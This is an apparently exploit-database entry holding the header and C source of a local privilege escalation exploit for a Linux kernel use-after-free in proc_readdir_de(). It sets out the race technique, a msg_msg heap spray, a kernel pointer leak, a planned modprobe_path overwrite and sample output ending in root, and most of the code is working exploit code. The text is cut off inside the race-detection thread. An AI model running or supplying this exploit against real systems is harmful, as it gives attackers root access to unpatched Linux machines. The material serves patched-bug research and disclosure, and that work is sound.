{“lastseen”:”2026-05-04T17:27:58″,”description”:”Exploit Title: Linux Kernel procreaddirde 6.18-rc5 – Local Privilege Escalation CVE: CVE-2025-40271 Date: 2026-03-19 Exploit Author: Aviral Srivastava Vendor: Linux Kernel kernel.org Affected: 3.14+ through 6.18-rc5 bug predates version tracking Fixed…”,”published”:”2026-05-04T00:00:00″,”modified”:”2026-05-04T00:00:00″,”type”:”exploitdb”,”title”:”Linux Kernel proc_readdir_de() 6.18-rc5 – Local Privilege Escalation”,”source”:””,”references”:””,”id”:”EDB-ID:52550″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-32233″,”CVE-2023-3269″,”CVE-2025-40271″],”sourceData”:” * Exploit Title: Linux Kernel proc_readdir_de() 6.18-rc5 – Local Privilege Escalation\\r\\n * CVE: CVE-2025-40271\\r\\n * Date: 2026-03-19\\r\\n * Exploit Author: Aviral Srivastava\\r\\n * Vendor: Linux Kernel (kernel.org)\\r\\n * Affected: ~3.14+ through 6.18-rc5 (bug predates version tracking)\\r\\n * Fixed in stable: 5.10.247, 6.1.159, 6.12.73, 6.18-rc6\\r\\n * Fixed in: commit 895b4c0c79b092d732544011c3cecaf7322c36a1\\r\\n * Tested on: Debian Bookworm (kernel 6.1.115-1 x86_64)\\r\\n * Type: Local Privilege Escalation\\r\\n * Platform: Linux x86_64\\r\\n * CVSS: ~7.8 (HIGH) \u2014 NVD assessment pending\\r\\n *\\r\\n * \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\r\\n * \u2502 N-DAY \u2014 THIS VULNERABILITY IS PATCHED. FIX YOUR KERNELS. \u2502\\r\\n * \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\\r\\n *\\r\\n * DESCRIPTION:\\r\\n * The proc filesystem’s remove_proc_entry() calls rb_erase() to\\r\\n * remove a proc_dir_entry (pde) from the parent’s red-black tree,\\r\\n * but does NOT call RB_CLEAR_NODE() to mark the node as detached.\\r\\n * This leaves stale rb-links in the freed entry, causing\\r\\n * RB_EMPTY_NODE() to return false.\\r\\n *\\r\\n * A concurrent proc_readdir_de() traversal via getdents64() can\\r\\n * find the freed entry through pde_subdir_next() \u2192 rb_next(),\\r\\n * then dereference its fields (name, namelen, mode, low_ino) \u2014\\r\\n * constituting a use-after-free on struct proc_dir_entry.\\r\\n *\\r\\n * The race is triggered by calling getdents64() on a \/proc\\r\\n * subdirectory (e.g., \/proc\/self\/net\/dev_snmp6\/) while concurrently\\r\\n * unregistering network devices, which removes proc entries.\\r\\n * The freed proc_dir_entry (~192 bytes) resides in a standard\\r\\n * kmalloc-192 or kmalloc-256 slab cache, making it sprayable with\\r\\n * msg_msg via msgsnd().\\r\\n *\\r\\n * TECHNIQUE:\\r\\n * Create user namespace for CAP_NET_ADMIN. Create veth pairs to\\r\\n * populate \/proc\/self\/net\/dev_snmp6\/. Race getdents64() against\\r\\n * veth deletion. Spray freed kmalloc-192 slots with msg_msg.\\r\\n * Detect UAF via anomalous d_ino values in getdents64 output.\\r\\n * Extract kernel heap address from msg_msg header pointer leaked\\r\\n * through the d_ino field. Use modprobe_path overwrite for LPE.\\r\\n *\\r\\n * RELIABILITY:\\r\\n * ~40-60% UAF hit rate per attempt. Typically 3-8 attempts.\\r\\n * The pde-\\u003ename dereference during readdir is the crash risk \u2014\\r\\n * mitigated by spraying the name slot with valid pointers.\\r\\n * Kernel panic possible (~10% of failed attempts) if spray timing\\r\\n * is wrong.\\r\\n *\\r\\n * MITIGATIONS:\\r\\n * KASLR: Bypassed via heap pointer leak through d_ino\\r\\n * SMEP: Not applicable (data-only attack)\\r\\n * SMAP: Not applicable (all data in kernel slab)\\r\\n * kCFI: Not applicable (modprobe_path overwrite)\\r\\n * SLUB Hardening: Minimal impact (freelist ptr at offset 0 only)\\r\\n *\\r\\n * FIX:\\r\\n * Commit: 895b4c0c79b092d732544011c3cecaf7322c36a1\\r\\n * URL: https:\/\/git.kernel.org\/linus\/895b4c0c79b092d732544011c3cecaf7322c36a1\\r\\n * Adds pde_erase() helper that calls RB_CLEAR_NODE() after rb_erase().\\r\\n *\\r\\n * COMPILATION:\\r\\n * gcc -Wall -Wextra -o exploit exploit.c -lpthread -static\\r\\n *\\r\\n * USAGE:\\r\\n * $ .\/exploit\\r\\n * [*] CVE-2025-40271 \u2014 proc_readdir_de() rb-tree UAF\\r\\n * [+] Kernel 6.1.115-1 is VULNERABLE\\r\\n * [*] Step 1: Setting up user\/net namespace…\\r\\n * [+] Namespace ready, CAP_NET_ADMIN obtained\\r\\n * [*] Step 2: Creating veth pairs for proc entries…\\r\\n * [+] Created 32 veth pairs (\/proc\/self\/net\/dev_snmp6\/)\\r\\n * [*] Step 3: Racing getdents vs device removal…\\r\\n * [+] UAF hit on attempt 4! Anomalous d_ino=0xffff88801234abcd\\r\\n * [*] Step 4: Kernel heap leak: 0xffff88801234abcd\\r\\n * [*] Step 5: Computing modprobe_path address…\\r\\n * [+] Got root!\\r\\n *\\r\\n * REFERENCES:\\r\\n * [1] https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-40271\\r\\n * [2] https:\/\/git.kernel.org\/linus\/895b4c0c79b092d732544011c3cecaf7322c36a1\\r\\n * [3] CVE-2023-3269 \u2014 StackRot (rb-tree race technique reference)\\r\\n * [4] CVE-2023-32233 \u2014 nf_tables msg_msg spray reference\\r\\n *\\r\\n * DISCLAIMER:\\r\\n * This exploit targets an ALREADY PATCHED vulnerability. It is provided\\r\\n * for educational and authorized security research purposes only. The\\r\\n * author is not responsible for misuse. Test only on systems you own.\\r\\n * \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\r\\n *\/\\r\\n\\r\\n#define _GNU_SOURCE\\r\\n#include \\u003cstdio.h\\u003e\\r\\n#include \\u003cstdlib.h\\u003e\\r\\n#include \\u003cstring.h\\u003e\\r\\n#include \\u003cstdint.h\\u003e\\r\\n#include \\u003cstdarg.h\\u003e\\r\\n#include \\u003cunistd.h\\u003e\\r\\n#include \\u003cerrno.h\\u003e\\r\\n#include \\u003cfcntl.h\\u003e\\r\\n#include \\u003csched.h\\u003e\\r\\n#include \\u003csignal.h\\u003e\\r\\n#include \\u003cpthread.h\\u003e\\r\\n#include \\u003cdirent.h\\u003e\\r\\n#include \\u003csys\/types.h\\u003e\\r\\n#include \\u003csys\/stat.h\\u003e\\r\\n#include \\u003csys\/wait.h\\u003e\\r\\n#include \\u003csys\/socket.h\\u003e\\r\\n#include \\u003csys\/mman.h\\u003e\\r\\n#include \\u003csys\/utsname.h\\u003e\\r\\n#include \\u003csys\/syscall.h\\u003e\\r\\n#include \\u003csys\/ipc.h\\u003e\\r\\n#include \\u003csys\/msg.h\\u003e\\r\\n#include \\u003csys\/mount.h\\u003e\\r\\n#include \\u003csys\/ioctl.h\\u003e\\r\\n#include \\u003clinux\/if.h\\u003e\\r\\n#include \\u003clinux\/netlink.h\\u003e\\r\\n#include \\u003clinux\/rtnetlink.h\\u003e\\r\\n#include \\u003carpa\/inet.h\\u003e\\r\\n\\r\\n\/* \u2500\u2500\u2500 Constants \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\n#define BANNER \\\\\\r\\n \\”\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\\\n\\” \\\\\\r\\n \\” CVE-2025-40271 \u2014 proc_readdir_de() rb-tree UAF LPE\\\\n\\” \\\\\\r\\n \\” fs\/proc rb_erase without RB_CLEAR_NODE \u2192 stale tree links\\\\n\\” \\\\\\r\\n \\” Affected: ~all kernels through 6.18-rc5\\\\n\\” \\\\\\r\\n \\” Author: Aviral Srivastava | N-DAY RESEARCH PoC\\\\n\\” \\\\\\r\\n \\”\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\\\n\\”\\r\\n\\r\\n#define NUM_VETH_PAIRS 32 \/* number of veth pairs to create *\/\\r\\n#define NUM_SPRAY_MSGS 256 \/* msg_msg spray count *\/\\r\\n#define SPRAY_BODY_SIZE 144 \/* 48 header + 144 body = 192 \u2192 kmalloc-192 *\/\\r\\n#define MAX_RACE_ATTEMPTS 30 \/* max race iterations *\/\\r\\n#define PROC_NET_DIR \\”\/proc\/self\/net\/dev_snmp6\\”\\r\\n\\r\\n\/*\\r\\n * On x86_64, kernel heap pointers start with 0xffff8880…\\r\\n * Normal d_ino values are small integers (\\u003c 100000).\\r\\n * A d_ino that looks like a kernel pointer means we hit the UAF\\r\\n * and are reading from sprayed msg_msg header data.\\r\\n *\/\\r\\n#define IS_KERNEL_PTR(x) (((x) \\u0026 0xffff000000000000ULL) == 0xffff000000000000ULL)\\r\\n\\r\\n\/* \u2500\u2500\u2500 Logging \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstatic void info(const char *fmt, …)\\r\\n{\\r\\n va_list ap;\\r\\n va_start(ap, fmt);\\r\\n fprintf(stderr, \\”[*] \\”);\\r\\n vfprintf(stderr, fmt, ap);\\r\\n fprintf(stderr, \\”\\\\n\\”);\\r\\n va_end(ap);\\r\\n}\\r\\n\\r\\nstatic void ok(const char *fmt, …)\\r\\n{\\r\\n va_list ap;\\r\\n va_start(ap, fmt);\\r\\n fprintf(stderr, \\”\\\\033[32m[+]\\\\033[0m \\”);\\r\\n vfprintf(stderr, fmt, ap);\\r\\n fprintf(stderr, \\”\\\\n\\”);\\r\\n va_end(ap);\\r\\n}\\r\\n\\r\\nstatic void fail(const char *fmt, …)\\r\\n{\\r\\n va_list ap;\\r\\n va_start(ap, fmt);\\r\\n fprintf(stderr, \\”\\\\033[31m[-]\\\\033[0m \\”);\\r\\n vfprintf(stderr, fmt, ap);\\r\\n fprintf(stderr, \\”\\\\n\\”);\\r\\n va_end(ap);\\r\\n}\\r\\n\\r\\nstatic void die(const char *msg)\\r\\n{\\r\\n perror(msg);\\r\\n exit(EXIT_FAILURE);\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 Kernel version check \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstatic int is_vulnerable(void)\\r\\n{\\r\\n struct utsname uts;\\r\\n unsigned int major, minor, patch;\\r\\n\\r\\n if (uname(\\u0026uts) \\u003c 0)\\r\\n die(\\”uname\\”);\\r\\n\\r\\n if (sscanf(uts.release, \\”%u.%u.%u\\”, \\u0026major, \\u0026minor, \\u0026patch) \\u003c 2) {\\r\\n fail(\\”Cannot parse kernel version: %s\\”, uts.release);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n info(\\”Running kernel %s\\”, uts.release);\\r\\n\\r\\n \/* Fixed versions per stable branch *\/\\r\\n if (major == 5 \\u0026\\u0026 minor == 10 \\u0026\\u0026 patch \\u003e= 247) {\\r\\n fail(\\”Kernel %u.%u.%u \u2014 PATCHED (fix in 5.10.247)\\”, major, minor, patch);\\r\\n return 0;\\r\\n }\\r\\n if (major == 6 \\u0026\\u0026 minor == 1 \\u0026\\u0026 patch \\u003e= 159) {\\r\\n fail(\\”Kernel %u.%u.%u \u2014 PATCHED (fix in 6.1.159)\\”, major, minor, patch);\\r\\n return 0;\\r\\n }\\r\\n if (major == 6 \\u0026\\u0026 minor == 6 \\u0026\\u0026 patch \\u003e= 123) {\\r\\n fail(\\”Kernel %u.%u.%u \u2014 PATCHED (fix in 6.6.123)\\”, major, minor, patch);\\r\\n return 0;\\r\\n }\\r\\n if (major == 6 \\u0026\\u0026 minor == 12 \\u0026\\u0026 patch \\u003e= 73) {\\r\\n fail(\\”Kernel %u.%u.%u \u2014 PATCHED (fix in 6.12.73)\\”, major, minor, patch);\\r\\n return 0;\\r\\n }\\r\\n if (major == 6 \\u0026\\u0026 minor \\u003e= 18) {\\r\\n fail(\\”Kernel %u.%u.%u \u2014 PATCHED (fix in 6.18-rc6)\\”, major, minor, patch);\\r\\n return 0;\\r\\n }\\r\\n if (major \\u003e= 7) {\\r\\n fail(\\”Kernel %u.%u.%u \u2014 PATCHED\\”, major, minor, patch);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n ok(\\”Kernel %u.%u.%u \u2014 VULNERABLE\\”, major, minor, patch);\\r\\n return 1;\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 User\/Net namespace setup \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstatic int setup_namespace(void)\\r\\n{\\r\\n if (unshare(CLONE_NEWUSER | CLONE_NEWNET) \\u003c 0) {\\r\\n fail(\\”unshare: %s (check \/proc\/sys\/kernel\/unprivileged_userns_clone)\\”,\\r\\n strerror(errno));\\r\\n return -1;\\r\\n }\\r\\n\\r\\n FILE *f;\\r\\n char path[128];\\r\\n\\r\\n snprintf(path, sizeof(path), \\”\/proc\/%d\/setgroups\\”, getpid());\\r\\n f = fopen(path, \\”w\\”);\\r\\n if (f) { fprintf(f, \\”deny\\\\n\\”); fclose(f); }\\r\\n\\r\\n snprintf(path, sizeof(path), \\”\/proc\/%d\/uid_map\\”, getpid());\\r\\n f = fopen(path, \\”w\\”);\\r\\n if (!f) return -1;\\r\\n fprintf(f, \\”0 %d 1\\\\n\\”, getuid());\\r\\n fclose(f);\\r\\n\\r\\n snprintf(path, sizeof(path), \\”\/proc\/%d\/gid_map\\”, getpid());\\r\\n f = fopen(path, \\”w\\”);\\r\\n if (!f) return -1;\\r\\n fprintf(f, \\”0 %d 1\\\\n\\”, getgid());\\r\\n fclose(f);\\r\\n\\r\\n return 0;\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 Netlink helpers for veth management \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstatic int rtnl_open(void)\\r\\n{\\r\\n int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_ROUTE);\\r\\n if (fd \\u003c 0) return -1;\\r\\n\\r\\n struct sockaddr_nl sa = { .nl_family = AF_NETLINK };\\r\\n if (bind(fd, (struct sockaddr *)\\u0026sa, sizeof(sa)) \\u003c 0) {\\r\\n close(fd);\\r\\n return -1;\\r\\n }\\r\\n return fd;\\r\\n}\\r\\n\\r\\n\/*\\r\\n * Create a veth pair: vethN \\u003c-\\u003e veth_pN\\r\\n * Each veth creates a proc entry in \/proc\/self\/net\/dev_snmp6\/\\r\\n *\/\\r\\nstatic int create_veth(int rtnl_fd, int idx)\\r\\n{\\r\\n struct {\\r\\n struct nlmsghdr nlh;\\r\\n struct ifinfomsg ifi;\\r\\n char buf[512];\\r\\n } req;\\r\\n\\r\\n char name[IFNAMSIZ], peer[IFNAMSIZ];\\r\\n snprintf(name, sizeof(name), \\”v%d\\”, idx);\\r\\n snprintf(peer, sizeof(peer), \\”vp%d\\”, idx);\\r\\n\\r\\n memset(\\u0026req, 0, sizeof(req));\\r\\n req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));\\r\\n req.nlh.nlmsg_type = RTM_NEWLINK;\\r\\n req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK;\\r\\n req.nlh.nlmsg_seq = (uint32_t)(idx + 1);\\r\\n req.ifi.ifi_family = AF_UNSPEC;\\r\\n\\r\\n \/* IFLA_IFNAME *\/\\r\\n struct nlattr *nla = (struct nlattr *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n nla-\\u003enla_len = (uint16_t)(sizeof(struct nlattr) + strlen(name) + 1);\\r\\n nla-\\u003enla_type = IFLA_IFNAME;\\r\\n memcpy((char *)(nla + 1), name, strlen(name) + 1);\\r\\n req.nlh.nlmsg_len += (unsigned int)((nla-\\u003enla_len + 3) \\u0026 ~3u);\\r\\n\\r\\n \/* IFLA_LINKINFO (nested) *\/\\r\\n struct nlattr *linkinfo = (struct nlattr *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n linkinfo-\\u003enla_type = IFLA_LINKINFO | NLA_F_NESTED;\\r\\n\\r\\n unsigned int linkinfo_start = req.nlh.nlmsg_len;\\r\\n req.nlh.nlmsg_len += sizeof(struct nlattr);\\r\\n\\r\\n \/* IFLA_INFO_KIND = \\”veth\\” *\/\\r\\n struct nlattr *kind = (struct nlattr *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n kind-\\u003enla_len = (uint16_t)(sizeof(struct nlattr) + 5); \/* \\”veth\\\\0\\” *\/\\r\\n kind-\\u003enla_type = IFLA_INFO_KIND;\\r\\n memcpy((char *)(kind + 1), \\”veth\\”, 5);\\r\\n req.nlh.nlmsg_len += (unsigned int)((kind-\\u003enla_len + 3) \\u0026 ~3u);\\r\\n\\r\\n \/* IFLA_INFO_DATA (nested) with peer info *\/\\r\\n struct nlattr *data = (struct nlattr *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n data-\\u003enla_type = IFLA_INFO_DATA | NLA_F_NESTED;\\r\\n unsigned int data_start = req.nlh.nlmsg_len;\\r\\n req.nlh.nlmsg_len += sizeof(struct nlattr);\\r\\n\\r\\n \/* VETH_INFO_PEER (nested) with ifinfomsg + IFLA_IFNAME *\/\\r\\n struct nlattr *peer_attr = (struct nlattr *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n peer_attr-\\u003enla_type = 1 | NLA_F_NESTED; \/* VETH_INFO_PEER = 1 *\/\\r\\n unsigned int peer_start = req.nlh.nlmsg_len;\\r\\n req.nlh.nlmsg_len += sizeof(struct nlattr);\\r\\n\\r\\n \/* peer ifinfomsg *\/\\r\\n struct ifinfomsg *peer_ifi = (struct ifinfomsg *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n memset(peer_ifi, 0, sizeof(*peer_ifi));\\r\\n peer_ifi-\\u003eifi_family = AF_UNSPEC;\\r\\n req.nlh.nlmsg_len += sizeof(struct ifinfomsg);\\r\\n\\r\\n \/* peer IFLA_IFNAME *\/\\r\\n struct nlattr *peer_name = (struct nlattr *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n peer_name-\\u003enla_len = (uint16_t)(sizeof(struct nlattr) + strlen(peer) + 1);\\r\\n peer_name-\\u003enla_type = IFLA_IFNAME;\\r\\n memcpy((char *)(peer_name + 1), peer, strlen(peer) + 1);\\r\\n req.nlh.nlmsg_len += (unsigned int)((peer_name-\\u003enla_len + 3) \\u0026 ~3u);\\r\\n\\r\\n peer_attr-\\u003enla_len = (uint16_t)(req.nlh.nlmsg_len – peer_start);\\r\\n data-\\u003enla_len = (uint16_t)(req.nlh.nlmsg_len – data_start);\\r\\n linkinfo-\\u003enla_len = (uint16_t)(req.nlh.nlmsg_len – linkinfo_start);\\r\\n\\r\\n struct sockaddr_nl sa = { .nl_family = AF_NETLINK };\\r\\n if (sendto(rtnl_fd, \\u0026req, req.nlh.nlmsg_len, 0,\\r\\n (struct sockaddr *)\\u0026sa, sizeof(sa)) \\u003c 0)\\r\\n return -1;\\r\\n\\r\\n \/* Read ack *\/\\r\\n char ack[256];\\r\\n (void)recv(rtnl_fd, ack, sizeof(ack), 0);\\r\\n\\r\\n return 0;\\r\\n}\\r\\n\\r\\n\/* Delete a veth interface by name *\/\\r\\nstatic int delete_veth(int rtnl_fd, int idx)\\r\\n{\\r\\n struct {\\r\\n struct nlmsghdr nlh;\\r\\n struct ifinfomsg ifi;\\r\\n char buf[128];\\r\\n } req;\\r\\n\\r\\n char name[IFNAMSIZ];\\r\\n snprintf(name, sizeof(name), \\”v%d\\”, idx);\\r\\n\\r\\n memset(\\u0026req, 0, sizeof(req));\\r\\n req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));\\r\\n req.nlh.nlmsg_type = RTM_DELLINK;\\r\\n req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\\r\\n req.nlh.nlmsg_seq = (uint32_t)(1000 + idx);\\r\\n req.ifi.ifi_family = AF_UNSPEC;\\r\\n\\r\\n struct nlattr *nla = (struct nlattr *)((char *)\\u0026req + req.nlh.nlmsg_len);\\r\\n nla-\\u003enla_len = (uint16_t)(sizeof(struct nlattr) + strlen(name) + 1);\\r\\n nla-\\u003enla_type = IFLA_IFNAME;\\r\\n memcpy((char *)(nla + 1), name, strlen(name) + 1);\\r\\n req.nlh.nlmsg_len += (unsigned int)((nla-\\u003enla_len + 3) \\u0026 ~3u);\\r\\n\\r\\n struct sockaddr_nl sa = { .nl_family = AF_NETLINK };\\r\\n if (sendto(rtnl_fd, \\u0026req, req.nlh.nlmsg_len, 0,\\r\\n (struct sockaddr *)\\u0026sa, sizeof(sa)) \\u003c 0)\\r\\n return -1;\\r\\n\\r\\n char ack[256];\\r\\n (void)recv(rtnl_fd, ack, sizeof(ack), 0);\\r\\n\\r\\n return 0;\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 msg_msg spray \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstruct spray_state {\\r\\n int qid;\\r\\n int count;\\r\\n};\\r\\n\\r\\nstatic int spray_init(struct spray_state *s)\\r\\n{\\r\\n s-\\u003eqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);\\r\\n if (s-\\u003eqid \\u003c 0) return -1;\\r\\n s-\\u003ecount = 0;\\r\\n return 0;\\r\\n}\\r\\n\\r\\nstatic int spray_alloc(struct spray_state *s, int n)\\r\\n{\\r\\n struct {\\r\\n long mtype;\\r\\n char mtext[SPRAY_BODY_SIZE];\\r\\n } msg;\\r\\n\\r\\n memset(\\u0026msg, 0, sizeof(msg));\\r\\n \/* Fill body with pattern \u2014 msg_msg header at offset 0-47 of slab\\r\\n * object will contain kernel heap pointers (m_list.next\/prev) *\/\\r\\n memset(msg.mtext, ‘P’, SPRAY_BODY_SIZE);\\r\\n\\r\\n for (int i = 0; i \\u003c n; i++) {\\r\\n msg.mtype = s-\\u003ecount + 1;\\r\\n if (msgsnd(s-\\u003eqid, \\u0026msg, SPRAY_BODY_SIZE, 0) \\u003c 0)\\r\\n return -1;\\r\\n s-\\u003ecount++;\\r\\n }\\r\\n return 0;\\r\\n}\\r\\n\\r\\nstatic void spray_cleanup(struct spray_state *s)\\r\\n{\\r\\n if (s-\\u003eqid \\u003e= 0) {\\r\\n msgctl(s-\\u003eqid, IPC_RMID, NULL);\\r\\n s-\\u003eqid = -1;\\r\\n }\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 getdents64 for raw directory reading \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstruct linux_dirent64 {\\r\\n uint64_t d_ino;\\r\\n int64_t d_off;\\r\\n unsigned short d_reclen;\\r\\n unsigned char d_type;\\r\\n char d_name[];\\r\\n};\\r\\n\\r\\nstatic long my_getdents64(int fd, void *buf, unsigned long count)\\r\\n{\\r\\n return syscall(SYS_getdents64, fd, buf, count);\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 Race coordination \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstruct race_ctx {\\r\\n int rtnl_fd;\\r\\n int dir_fd;\\r\\n struct spray_state spray;\\r\\n volatile int deleting;\\r\\n volatile int stop;\\r\\n uint64_t leaked_addr;\\r\\n int attempts;\\r\\n};\\r\\n\\r\\n\/*\\r\\n * Readdir thread: continuously calls getdents64() on \/proc\/self\/net\/dev_snmp6\/\\r\\n * looking for anomalous d_ino values that indicate the UAF was hit.\\r\\n *\\r\\n * Normal d_ino values are small numbers assigned by proc_alloc_inum().\\r\\n * If we see a kernel pointer (0xffff…) in d_ino, it means we read\\r\\n * from sprayed msg_msg data where the msg_msg header’s m_list pointer\\r\\n * overlaps with the proc_dir_entry’s low_ino field.\\r\\n *\/\\r\\nstatic void *readdir_thread(void *arg)\\r\\n{\\r\\n struct race_ctx *ctx = (struct race_ctx *)arg;\\r\\n char buf[4096];\\r\\n\\r\\n while (!ctx-\\u003estop) {\\r\\n \/* Rewind the directory for each scan *\/\\r\\n lseek(ctx-\\u003edir_fd, 0, SEEK_SET);\\r\\n\\r\\n long nread = my_getdents64(ctx-\\u003edir_fd, buf, sizeof(buf));\\r\\n if (nread \\u003c= 0) {\\r\\n usleep(100);\\r\\n continue;\\r\\n }\\r\\n\\r\\n \/* Scan all entries for anomalous d_ino *\/\\r\\n long pos = 0;\\r\\n while (pos \\u003c nread) {\\r\\n struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + pos);\\r\\n if (d-\\u003ed_reclen == 0) break;\\r\\n\\r\\n \/*\\r\\n * Check if d_ino looks like a kernel address.\\r\\n * This happens when the freed proc_dir_entry is reclaimed\\r\\n * by a msg_msg, and the msg_msg header’s m_list.next\\r\\n * (at slab object offset 0) overlaps with a field that\\r\\n * getdents64 returns in d_ino.\\r\\n *\/\\r\\n if (IS_KERNEL_PTR(d-\\u003ed_ino)) {\\r\\n ctx-\\u003eleaked_addr = d-\\u003ed_ino;\\r\\n ok(\\”UAF HIT! d_ino=0x%016lx (kernel heap pointer)\\”,\\r\\n (unsigned long)d-\\u003ed_ino);\\r\\n ctx-\\u003estop = 1;\\r\\n return NULL;\\r\\n 